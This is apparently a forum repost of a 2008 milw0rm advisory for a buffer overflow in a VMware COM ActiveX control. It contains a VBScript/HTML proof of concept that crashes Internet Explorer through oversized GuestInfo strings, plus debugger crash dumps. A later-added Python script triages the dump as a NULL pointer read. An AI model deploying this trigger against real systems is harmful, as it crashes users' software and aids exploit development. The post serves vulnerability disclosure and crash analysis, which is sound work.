
鎏锦
VMware COM API buffer overflow

Original source: http://www.milw0rm.com/

Test environment: Windows XP Professional SP3 with all patches, Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:38DB77F9-058D-4955-98AA-4A9F3B6A5B06' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
  buff_1 = String (2000, "a")
  buff_2 = String (2000, "b")
  test.GuestInfo (buff_1) = buff_2
End Sub
</script>

Dump:
09:25:39.339  pid=0640 tid=0504  EXCEPTION (first-chance)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION reading [00000070])
              ----------------------------------------------------------------
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61
              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07
              ESP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00
              EBP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00
              ESI=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07
              EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62
              EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90
                            --> MOV EDX,[ECX+70]
              ----------------------------------------------------------------

09:25:39.339  pid=0640 tid=0504  EXCEPTION (unhandled)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION reading [00000070])
              ----------------------------------------------------------------
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61
              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07
              ESP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00
              EBP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00
              ESI=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07
              EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62
              EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90
                            --> MOV EDX,[ECX+70]
              ----------------------------------------------------------------
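Added here as a triage aid, not part of the original post or the milw0rm advisory: a Python script that parses the register dump above and reports which registers point at memory filled with the PoC's 'a' (0x61) and 'b' (0x62) bytes, and whether the faulting MOV is a NULL-based read (ECX=0, fault address 0x70) rather than a dereference of attacker-controlled data, which is what decides whether the crash is a denial of service or something worse. The embedded dump is a constructed excerpt of the first-chance block above; the buff_1/buff_2 labels are the PoC's variable names.

```python
import re

# Constructed sample input: an excerpt of the first-chance exception block quoted
# in the post, embedded here so the triage runs offline.
SAMPLE_DUMP = """\
Exception C0000005 (ACCESS_VIOLATION reading [00000070])
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62
EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90
              --> MOV EDX,[ECX+70]
"""

EXC_RE = re.compile(r"Exception ([0-9A-F]{8}) \((\w+) (reading|writing) \[([0-9A-F]{8})\]\)")
REG_RE = re.compile(r"^\s*(E[A-Z]{2})=([0-9A-F]{8}): (.+)$", re.M)
INSN_RE = re.compile(r"-->\s*(.+?)\s*$", re.M)
DEREF_RE = re.compile(r"\[(E[A-Z]{2})(?:\+([0-9A-F]+))?\]")

def parse_dump(text):
    """Extract the fault, the register snapshot and the faulting instruction."""
    exc = EXC_RE.search(text)
    regs = {}
    for name, value, raw in REG_RE.findall(text):
        toks = raw.replace("-", " ").split()
        # '??' means the debugger could not read memory at that register's address
        mem = None if "??" in toks else bytes(int(t, 16) for t in toks)
        regs[name] = (int(value, 16), mem)
    insn = INSN_RE.search(text)
    return {"code": exc.group(1), "access": exc.group(3), "fault_addr": int(exc.group(4), 16),
            "regs": regs, "insn": insn.group(1) if insn else ""}

def triage(dump, markers=(("buff_1", 0x61), ("buff_2", 0x62))):
    """Which registers point at marker-filled input, and is the faulting base NULL?"""
    controlled = {name: label for name, (_, mem) in dump["regs"].items()
                  for label, byte in markers if mem and set(mem) == {byte}}
    deref = DEREF_RE.search(dump["insn"])
    base = deref.group(1) if deref else None
    offset = int(deref.group(2), 16) if deref and deref.group(2) else 0
    base_val = dump["regs"][base][0] if base in dump["regs"] else None
    null_deref = base_val == 0 and dump["fault_addr"] < 0x10000
    verdict = ("NULL pointer read: crash/DoS; the controlled buffers are not the faulting pointer"
               if null_deref and dump["access"] == "reading" else
               "faulting pointer derived from controlled input: treat as potentially exploitable"
               if base in controlled else "access violation: needs further root-cause analysis")
    return {"controlled_regs": controlled, "deref_base": base, "null_deref": null_deref,
            "consistent": base_val is not None and base_val + offset == dump["fault_addr"],
            "verdict": verdict}
```

The "consistent" flag confirms that base register plus displacement equals the reported fault address, so the dump is self-consistent before any conclusion is drawn from it.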
Posted: 2008-09-02 18:02 | [OP]